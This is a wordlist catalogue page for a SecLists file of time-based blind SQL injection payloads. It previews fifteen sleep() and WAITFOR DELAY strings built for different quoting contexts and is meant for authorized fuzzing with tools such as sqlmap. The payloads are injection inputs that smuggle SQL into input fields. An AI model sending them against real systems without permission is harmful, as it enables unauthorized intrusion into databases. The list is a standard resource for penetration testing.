Skip to content
Fuzzing1.2 KB

Generic Blind SQL Injection

Time-based blind SQL injection payloads using sleep() and WAITFOR DELAY across multiple quoting and parenthesis contexts. Designed for inference attacks where no error output is returned.

View source
Size
1.2 KB
Category
Fuzzing
Source
danielmiessler/SecLists
License
MIT
Recommended tools
sqlmapwfuzzburp

Preview

First 15 entries. Download or copy the full list (1.2 KB) using the buttons above.

>head generic-blind-sqli-fuzzdb.txt1.2 KB
# from wapiti
sleep(__TIME__)#
1 or sleep(__TIME__)#
" or sleep(__TIME__)#
' or sleep(__TIME__)#
" or sleep(__TIME__)="
' or sleep(__TIME__)='
1) or sleep(__TIME__)#
") or sleep(__TIME__)="
') or sleep(__TIME__)='
1)) or sleep(__TIME__)#
")) or sleep(__TIME__)="
')) or sleep(__TIME__)='
;waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:__TIME__'--

Time-based blind SQL injection payloads using sleep() and WAITFOR DELAY across multiple quoting and parenthesis contexts. Designed for inference attacks where no error output is returned.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 1.2 KB and pairs well with tools such as sqlmap, wfuzz, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from danielmiessler/SecLists and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.